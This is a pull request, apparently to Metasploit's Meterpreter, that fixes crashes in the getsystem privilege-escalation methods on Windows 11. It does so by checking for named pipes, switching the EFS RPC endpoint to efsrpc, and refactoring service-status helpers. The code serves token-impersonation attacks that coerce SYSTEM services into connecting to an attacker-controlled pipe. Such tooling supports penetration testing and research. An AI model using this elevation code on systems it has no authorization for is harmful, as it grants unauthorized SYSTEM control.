### PR TITLE
fix for #608 issue in getsystem methods

### DIFF
--- a/c/meterpreter/source/extensions/priv/namedpipe.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe.c
@@ -394,7 +394,7 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
 BOOL does_pipe_exist(LPWSTR pPipeName)
 {
 	HANDLE hPipe;
-	if ((hPipe = CreateFileW(pPipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE)
+	if ((hPipe = CreateFileW(pPipeName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE)
 		return FALSE;
 	CloseHandle(hPipe);
 	return TRUE;

--- a/c/meterpreter/source/extensions/priv/namedpipe.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe.c
@@ -391,7 +391,7 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
 	return dwResult;
 }
 
-BOOL is_pipe_exists(LPWSTR pPipeName)
+BOOL does_pipe_exist(LPWSTR pPipeName)
 {
 	HANDLE hPipe;
 	if ((hPipe = CreateFileW(pPipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE)

--- a/c/meterpreter/source/extensions/priv/namedpipe.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe.c
@@ -390,3 +390,12 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
 
 	return dwResult;
 }
+
+BOOL is_pipe_exists(LPWSTR pPipeName)
+{
+	HANDLE hPipe;
+	if ((hPipe = CreateFileW(pPipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)) == INVALID_HANDLE_VALUE)
+		return FALSE;
+	CloseHandle(hPipe);
+	return TRUE;
+}

--- a/c/meterpreter/source/extensions/priv/namedpipe.h
+++ b/c/meterpreter/source/extensions/priv/namedpipe.h
@@ -12,4 +12,6 @@ typedef struct _PRIV_POST_IMPERSONATION {
 	PVOID                     pCallbackParam;
 } PRIV_POST_IMPERSONATION, * PPRIV_POST_IMPERSONATION;
 
+BOOL is_pipe_exists(LPWSTR pPipeName);
+
 #endif

--- a/c/meterpreter/source/extensions/priv/namedpipe.h
+++ b/c/meterpreter/source/extensions/priv/namedpipe.h
@@ -12,6 +12,6 @@ typedef struct _PRIV_POST_IMPERSONATION {
 	PVOID                     pCallbackParam;
 } PRIV_POST_IMPERSONATION, * PPRIV_POST_IMPERSONATION;
 
-BOOL is_pipe_exists(LPWSTR pPipeName);
+BOOL does_pipe_exist(LPWSTR pPipeName);
 
 #endif

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -66,23 +66,23 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 		}
 		else {
 			DWORD state;
-			if (query_service_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
-				BREAK_ON_ERROR("[ELEVATE] query_service_status: query service efs status failed.");
+			if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
+				BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
 			}
 
 			if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
-				dprintf("[ELEVATE] query_service_status: efs service is not running. Trying to start ..");
+				dprintf("[ELEVATE] service_query_status: efs service is not running. Trying to start ..");
 				if (service_start(EFS_SERVICE_NAME) != ERROR_SUCCESS) {
 					BREAK_ON_ERROR("[ELEVATE] service_start: starting efs service failed.");
 				}
 			}
 
-			if (query_service_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
-				BREAK_ON_ERROR("[ELEVATE] query_service_status: query service efs status failed.");
+			if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
+				BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
 			}
 
 			if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
-				dprintf("[ELEVATE] query_service_status: efs service is not running.");
+				dprintf("[ELEVATE] service_query_status: efs service is not running.");
 			}
 
 			Sleep(5000);

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -9,8 +9,8 @@ RPC_STATUS EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
 DWORD WINAPI trigger_efs_connection(LPWSTR pPipeName);
 handle_t efs_bind(wchar_t* target);
 
-const RPC_WSTR MS_EFSR_UUID = (RPC_WSTR)L"c681d488-d850-11d0-8c52-00c04fd90f7e";
-const RPC_WSTR LSARPC_NAMEDPIPE = (RPC_WSTR)L"\\pipe\\lsarpc";
+const RPC_WSTR MS_EFSR_UUID = (RPC_WSTR)L"df1941c5-fe89-4e79-bf10-463657acf44d";
+const RPC_WSTR EFSRPC_NAMEDPIPE = (RPC_WSTR)L"\\pipe\\efsrpc";
 
 DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 {
@@ -137,6 +137,7 @@ DWORD WINAPI trigger_efs_connection(LPWSTR pPipeName)
 		if (hr == ERROR_BAD_NETPATH) {
 			dprintf("[ELEVATE] trigger_efs_connection: Success");
 		} else {
+			dwResult = hr;
 			dprintf("[ELEVATE] trigger_efs_connection: Did not receive expected output. Attack might have failed.");
 		}
 
@@ -177,7 +178,7 @@ handle_t efs_bind(wchar_t* target)
 		MS_EFSR_UUID,
 		(RPC_WSTR)L"ncacn_np",
 		(RPC_WSTR)buffer,
-		LSARPC_NAMEDPIPE,
+		EFSRPC_NAMEDPIPE,
 		NULL,
 		&StringBinding);
 	CHECK_RPC_STATUS_AND_RETURN("RpcStringBindingComposeW", RpcStatus);

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -5,7 +5,7 @@
 
 typedef NTSTATUS(WINAPI* PRtlGetVersion)(LPOSVERSIONINFOEXW);
 
-RPC_STATUS StubEfsRpcEncryptFileSrv(PMIDL_STUB_DESC stub, handle_t binding_h, wchar_t* FileName);
+long StubEfsRpcEncryptFileSrv(PMIDL_STUB_DESC stub, handle_t binding_h, wchar_t* FileName);
 PMIDL_STUB_DESC GetLsaRpcStub();
 PMIDL_STUB_DESC GetEfsRpcStub();
 
@@ -178,7 +178,7 @@ DWORD WINAPI trigger_efs_connection(RPC_WSTR uuid, RPC_WSTR endpoint, LPWSTR pPi
 				BREAK_WITH_ERROR("[ELEVATE] trigger_efs_connection: Bind error", ERROR_INVALID_HANDLE);
 			}
 			PMIDL_STUB_DESC stub = wcscmp(endpoint, LSARPC_NAMEDPIPE) == 0 ? GetLsaRpcStub() : GetEfsRpcStub();
-			hr = StubEfsRpcEncryptFileSrv(stub, ht, pCaptureServer);
+			hr = (RPC_STATUS)StubEfsRpcEncryptFileSrv(stub, ht, pCaptureServer);
 		RpcExcept(EXCEPTION_EXECUTE_HANDLER)
 			dprintf("[ELEVATE] trigger_efs_connection: RPC Error: 0x%08x", RpcExceptionCode());
 			dwResult = RPC_S_CALL_FAILED;

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -137,8 +137,14 @@ DWORD WINAPI trigger_efs_connection(LPWSTR pPipeName)
 		if (hr == ERROR_BAD_NETPATH) {
 			dprintf("[ELEVATE] trigger_efs_connection: Success");
 		} else {
-			dwResult = hr;
-			dprintf("[ELEVATE] trigger_efs_connection: Did not receive expected output. Attack might have failed.");
+			unsigned char RpcError[DCE_C_ERROR_STRING_LEN];
+			if (DceErrorInqTextA(hr, RpcError) == RPC_S_OK) {
+				dprintf("[ELEVATE] trigger_efs_connection - RPC error in EfsRpcEncryptFileSrv: 0x%08x - %s", hr, RpcError);
+			}
+			else {
+				dprintf("[ELEVATE] trigger_efs_connection - RPC error in EfsRpcEncryptFileSrv: 0x%08x", hr);
+			}
+			dwResult = RPC_S_CALL_FAILED;
 		}
 
 	} while (0);

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -85,22 +85,9 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 			}
 			else
 			{
-				DWORD            max_timeout = 10000;
-				DWORD        current_timeout = 0;
-				BOOL  has_query_status_error = FALSE;
-
-				while ((state == SERVICE_START_PENDING || state == SERVICE_CONTINUE_PENDING) && current_timeout < max_timeout) {
-					if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
-						has_query_status_error = TRUE;
-						BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
-					}
-					Sleep(500);
-					current_timeout += 500;
-				}
-				if (has_query_status_error) break;
-
-				if (state != SERVICE_RUNNING) {
-					BREAK_ON_ERROR("[ELEVATE] service_query_status: efs service is not running.");
+				DWORD dwTimeout = 30000;
+				if (service_wait_for_status(EFS_SERVICE_NAME, SERVICE_RUNNING, dwTimeout) != ERROR_SUCCESS) {
+					BREAK_ON_ERROR("[ELEVATE] service_wait_for_status: service start timed out.");
 				}
 			}
 

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -83,7 +83,7 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 			Sleep(500);
 		}
 
-		trigger_efs_connection(cPipeName2);
+		DWORD dwTriggerResult = trigger_efs_connection(cPipeName2);
 
 		// signal our thread to terminate if it is still running
 		met_api->thread.sigterm(pThread);
@@ -98,6 +98,9 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 				ERROR_INVALID_HANDLE);
 		}
 		dprintf("[ELEVATE] dwResult after exit code: %u", dwResult);
+
+		if (dwResult == ERROR_DBG_TERMINATE_THREAD)
+			dwResult = dwTriggerResult;
 
 	} while (0);
 

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -58,38 +58,50 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 			wNamedPipeEndpoint = &LSARPC_NAMEDPIPE;
 		}
 		else {
-			DWORD state;
-			if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
-				BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
-			}
-
-			if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
-				dprintf("[ELEVATE] service_query_status: efs service is not running. Trying to start ..");
-				if (service_start(EFS_SERVICE_NAME) != ERROR_SUCCESS) {
-					BREAK_ON_ERROR("[ELEVATE] service_start: starting efs service failed.");
-				}
+			if (!does_pipe_exist(L"\\\\.\\pipe\\lsarpc") && !does_pipe_exist(L"\\\\.\\pipe\\efsrpc")) {
+				DWORD state;
 				if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
 					BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
 				}
-			}
 
-			if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
-				BREAK_ON_ERROR("[ELEVATE] service_query_status: efs service is not running.");
-			}
-			else
-			{
-				DWORD dwTimeout = 30000;
-				if (service_wait_for_status(EFS_SERVICE_NAME, SERVICE_RUNNING, dwTimeout) != ERROR_SUCCESS) {
-					BREAK_ON_ERROR("[ELEVATE] service_wait_for_status: service start timed out.");
+				if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
+					dprintf("[ELEVATE] service_query_status: efs service is not running. Trying to start ..");
+					if (service_start(EFS_SERVICE_NAME) != ERROR_SUCCESS) {
+						BREAK_ON_ERROR("[ELEVATE] service_start: starting efs service failed.");
+					}
+					if (service_query_status(EFS_SERVICE_NAME, &state) != ERROR_SUCCESS) {
+						BREAK_ON_ERROR("[ELEVATE] service_query_status: query service efs status failed.");
+					}
+				}
+
+				if (state != SERVICE_RUNNING && state != SERVICE_START_PENDING && state != SERVICE_CONTINUE_PENDING) {
+					BREAK_ON_ERROR("[ELEVATE] service_query_status: efs service is not running.");
+				}
+				else
+				{
+					DWORD dwTimeout = 30000;
+					if (service_wait_for_status(EFS_SERVICE_NAME, SERVICE_RUNNING, dwTimeout) != ERROR_SUCCESS) {
+						BREAK_ON_ERROR("[ELEVATE] service_wait_for_status: service start timed out.");
+					}
 				}
 			}
 
 			if (!does_pipe_exist(L"\\\\.\\pipe\\efsrpc")) {
-				BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: \\pipe\\efsrpc is not listening.");
+				if (os.dwBuildNumber <= 22000) {
+					if (!does_pipe_exist(L"\\\\.\\pipe\\lsarpc")) {
+						BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: neither \\pipe\\lsarpc nor \\pipe\\efsrpc is not listening.");
+					}
+					wEndpointUUID = &LSARPC_PIPE_MS_EFSR_UUID;
+					wNamedPipeEndpoint = &LSARPC_NAMEDPIPE;
+				}
+				else {
+					BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: \\pipe\\efsrpc is not listening.");
+				}
 			}
-
-			wEndpointUUID = &EFSRPC_PIPE_MS_EFSR_UUID;
-			wNamedPipeEndpoint = &EFSRPC_NAMEDPIPE;
+			else {
+				wEndpointUUID = &EFSRPC_PIPE_MS_EFSR_UUID;
+				wNamedPipeEndpoint = &EFSRPC_NAMEDPIPE;
+			}
 		}
 
 		// generate a pseudo random name for the pipe

--- a/c/meterpreter/source/extensions/priv/namedpipe_efs.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_efs.c
@@ -26,6 +26,10 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 	PRIV_POST_IMPERSONATION PostImpersonation;
 
 	do {
+		if (!does_pipe_exist(L"\\\\.\\pipe\\efsrpc")) {
+			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: \\pipe\\efsrpc is not listening.");
+		}
+
 		hNtdll = GetModuleHandleA("ntdll");
 		if (hNtdll == NULL) {
 			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: Failed to resolve RtlGetVersion");

--- a/c/meterpreter/source/extensions/priv/namedpipe_printspooler.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_printspooler.c
@@ -32,8 +32,8 @@ DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet)
 	PRIV_POST_IMPERSONATION PostImpersonation;
 
 	do {
-		if (!is_pipe_exists(L"\\\\.\\pipe\\spoolss")) {
-			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: \\pipe\\spoolss is not listenning.");
+		if (!does_pipe_exist(L"\\\\.\\pipe\\spoolss")) {
+			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: \\pipe\\spoolss is not listening.");
 		}
 
 		hNtdll = GetModuleHandleA("ntdll");
@@ -154,7 +154,7 @@ DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName)
 		{
 			BREAK_ON_ERROR("[ELEVATE] Out of Memory");
 		}
-		
+
 		_snwprintf_s(pPrinterName, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\%s"), pComputerName);
 		_snwprintf_s(pCaptureServer, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\localhost/pipe/%s"), pPipeName);
 
@@ -169,7 +169,7 @@ DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName)
 		RpcExcept(EXCEPTION_EXECUTE_HANDLER);
 		{
 			BREAK_WITH_ERROR("[ELEVATE] Out of Memory", RpcExceptionCode());
-		} 
+		}
 		RpcEndExcept;
 
 	} while (0);

--- a/c/meterpreter/source/extensions/priv/namedpipe_printspooler.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe_printspooler.c
@@ -32,6 +32,10 @@ DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet)
 	PRIV_POST_IMPERSONATION PostImpersonation;
 
 	do {
+		if (!is_pipe_exists(L"\\\\.\\pipe\\spoolss")) {
+			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: \\pipe\\spoolss is not listenning.");
+		}
+
 		hNtdll = GetModuleHandleA("ntdll");
 		if (hNtdll == NULL) {
 			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Failed to resolve RtlGetVersion");

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -176,7 +176,7 @@ DWORD service_destroy( char * cpName )
 /*
  * Query service state.
  */
-DWORD query_service_status( char* cpName, DWORD* dwState )
+DWORD service_query_status( char* cpName, DWORD* dwState )
 {
 	DWORD dwResult  = ERROR_SUCCESS;
 	HANDLE hManager = NULL;
@@ -187,18 +187,18 @@ DWORD query_service_status( char* cpName, DWORD* dwState )
 	do
 	{
 		if( !cpName )
-			BREAK_WITH_ERROR( "[SERVICE] query_service_status. cpName is NULL", ERROR_INVALID_HANDLE );
+			BREAK_WITH_ERROR( "[SERVICE] service_query_status. cpName is NULL", ERROR_INVALID_HANDLE );
 
 		hManager = OpenSCManagerA( NULL, NULL, SC_MANAGER_CONNECT);
 		if( !hManager )
-			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenSCManagerA failed" );
+			BREAK_ON_ERROR( "[SERVICE] service_query_status. OpenSCManagerA failed" );
 
 		hService = OpenServiceA( hManager, cpName, SERVICE_QUERY_STATUS);
 		if( !hService )
-			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenServiceA failed" );
+			BREAK_ON_ERROR( "[SERVICE] service_query_status. OpenServiceA failed");
 
 		if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (LPBYTE)&procInfo, sizeof(procInfo), &dwBytes)) {
-			BREAK_ON_ERROR("[SERVICE] query_service_status. QueryServiceStatusEx failed");
+			BREAK_ON_ERROR("[SERVICE] service_query_status. QueryServiceStatusEx failed");
 		}
 		else {
 			*dwState = procInfo.dwCurrentState;

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -67,7 +67,7 @@ DWORD service_stop( char * cpName )
 			BREAK_ON_ERROR( "[SERVICE] service_stop. ControlService STOP failed" );
 		
 		if (service_wait_for_status(cpName, SERVICE_STOPPED, dwTimeout) != ERROR_SUCCESS) {
-			BREAK_ON_ERROR("[ELEVATE] service_stop: service start timed out.");
+			BREAK_ON_ERROR("[ELEVATE] service_stop: service stop timed out.");
 		}
 
 	} while( 0 );

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -155,10 +155,54 @@ DWORD service_destroy( char * cpName )
 		
 		hService = OpenServiceA( hManager, cpName, DELETE ); 
 		if( !hService )
-			BREAK_ON_ERROR( "[SERVICE] service_stop. OpenServiceA failed" );
+			BREAK_ON_ERROR( "[SERVICE] service_destroy. OpenServiceA failed" );
 
 		if( !DeleteService( hService ) )
 			BREAK_ON_ERROR( "[SERVICE] service_destroy. DeleteService failed" );
+
+	} while( 0 );
+
+	if( hService )
+		CloseServiceHandle( hService ); 
+
+	if( hManager )
+		CloseServiceHandle( hManager ); 
+
+	SetLastError( dwResult );
+
+	return dwResult;
+}
+
+/*
+ * Query service state.
+ */
+DWORD query_service_status( char* cpName, DWORD* dwState )
+{
+	DWORD dwResult  = ERROR_SUCCESS;
+	HANDLE hManager = NULL;
+	HANDLE hService = NULL;
+	DWORD dwBytes;
+	SERVICE_STATUS_PROCESS procInfo;
+
+	do
+	{
+		if( !cpName )
+			BREAK_WITH_ERROR( "[SERVICE] query_service_status. cpName is NULL", ERROR_INVALID_HANDLE );
+
+		hManager = OpenSCManagerA( NULL, NULL, SC_MANAGER_ALL_ACCESS );
+		if( !hManager )
+			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenSCManagerA failed" );
+
+		hService = OpenServiceA( hManager, cpName, DELETE ); 
+		if( !hService )
+			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenServiceA failed" );
+
+		if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (LPBYTE)&procInfo, sizeof(procInfo), &dwBytes)) {
+			BREAK_ON_ERROR("[SERVICE] query_service_status. QueryServiceStatusEx failed");
+		}
+		else {
+			*dwState = procInfo.dwCurrentState;
+		}
 
 	} while( 0 );
 

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -217,8 +217,6 @@ DWORD service_query_status( char* cpName, DWORD* dwState )
 	if( hManager )
 		CloseServiceHandle( hManager );
 
-	SetLastError( dwResult );
-
 	return dwResult;
 }
 

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -189,11 +189,11 @@ DWORD query_service_status( char* cpName, DWORD* dwState )
 		if( !cpName )
 			BREAK_WITH_ERROR( "[SERVICE] query_service_status. cpName is NULL", ERROR_INVALID_HANDLE );
 
-		hManager = OpenSCManagerA( NULL, NULL, SC_MANAGER_ALL_ACCESS );
+		hManager = OpenSCManagerA( NULL, NULL, SC_MANAGER_CONNECT);
 		if( !hManager )
 			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenSCManagerA failed" );
 
-		hService = OpenServiceA( hManager, cpName, DELETE ); 
+		hService = OpenServiceA( hManager, cpName, SERVICE_QUERY_STATUS);
 		if( !hService )
 			BREAK_ON_ERROR( "[SERVICE] query_service_status. OpenServiceA failed" );
 

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -194,11 +194,16 @@ DWORD service_query_status( char* cpName, DWORD* dwState )
 			BREAK_ON_ERROR( "[SERVICE] service_query_status. OpenSCManagerA failed" );
 
 		hService = OpenServiceA( hManager, cpName, SERVICE_QUERY_STATUS);
-		if( !hService )
-			BREAK_ON_ERROR( "[SERVICE] service_query_status. OpenServiceA failed");
+		if( !hService ){
+			char buffer[1024];
+			_snprintf_s(buffer, sizeof(buffer), sizeof(buffer) - 1, "[SERVICE] service_query_status. OpenServiceA failed for %s ", cpName);
+			BREAK_ON_ERROR( buffer );
+		}
 
 		if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (LPBYTE)&procInfo, sizeof(procInfo), &dwBytes)) {
-			BREAK_ON_ERROR("[SERVICE] service_query_status. QueryServiceStatusEx failed");
+			char buffer[1024];
+			_snprintf_s(buffer, sizeof(buffer), sizeof(buffer) - 1, "[SERVICE] service_query_status. QueryServiceStatusEx failed for %s ", cpName);
+			BREAK_ON_ERROR( buffer );
 		}
 		else {
 			*dwState = procInfo.dwCurrentState;

--- a/c/meterpreter/source/extensions/priv/service.c
+++ b/c/meterpreter/source/extensions/priv/service.c
@@ -212,12 +212,42 @@ DWORD service_query_status( char* cpName, DWORD* dwState )
 	} while( 0 );
 
 	if( hService )
-		CloseServiceHandle( hService ); 
+		CloseServiceHandle( hService );
 
 	if( hManager )
-		CloseServiceHandle( hManager ); 
+		CloseServiceHandle( hManager );
 
 	SetLastError( dwResult );
+
+	return dwResult;
+}
+
+/*
+ * Wait for a service to get into specific status.
+ */
+DWORD service_wait_for_status( char* cpName, DWORD dwStatus, DWORD dwMaxTimeout )
+{
+	DWORD dwCurrentStatus;
+	DWORD dwElapsed = 0;
+	DWORD dwResult;
+	do {
+		dwResult = service_query_status(cpName, &dwCurrentStatus);
+		if (dwResult != ERROR_SUCCESS) {
+			break;
+		}
+		if (dwCurrentStatus == dwStatus) {
+			break;
+		}
+		else {
+			Sleep(250);
+			dwElapsed += 250;
+		}
+	} while (dwElapsed < dwMaxTimeout);
+
+	if ((dwResult == ERROR_SUCCESS) && (dwCurrentStatus != dwStatus)) {
+		dwResult = WAIT_TIMEOUT;
+		SetLastError(dwResult);
+	}
 
 	return dwResult;
 }

--- a/c/meterpreter/source/extensions/priv/service.h
+++ b/c/meterpreter/source/extensions/priv/service.h
@@ -11,4 +11,6 @@ DWORD service_destroy( char * cpName );
 
 DWORD service_query_status( char * cpName, DWORD* dwState );
 
+DWORD service_wait_for_status( char * cpName, DWORD dwStatus, DWORD dwMaxTimeout );
+
 #endif

--- a/c/meterpreter/source/extensions/priv/service.h
+++ b/c/meterpreter/source/extensions/priv/service.h
@@ -9,4 +9,6 @@ DWORD service_create( char * cpName, char * cpPath );
 
 DWORD service_destroy( char * cpName );
 
+DWORD query_service_status( char * cpName, DWORD* dwState );
+
 #endif

--- a/c/meterpreter/source/extensions/priv/service.h
+++ b/c/meterpreter/source/extensions/priv/service.h
@@ -9,6 +9,6 @@ DWORD service_create( char * cpName, char * cpPath );
 
 DWORD service_destroy( char * cpName );
 
-DWORD query_service_status( char * cpName, DWORD* dwState );
+DWORD service_query_status( char * cpName, DWORD* dwState );
 
 #endif


### PR DESCRIPTION
This PR contains fix for #608 which has two changes:

- Checking for existence of `\pipe\spoolss` before using it.
- Switch from `\pipe\lsarpc` to `\pipe\efsrpc` endpoint.

to prevent `getsystem` command (methods 5 and 6) from getting crash, on Windows 11 22H2.

**NOTE**: This PR and [#10 on mimikatz](https://github.com/rapid7/mimikatz/pull/10) fork, are tied together.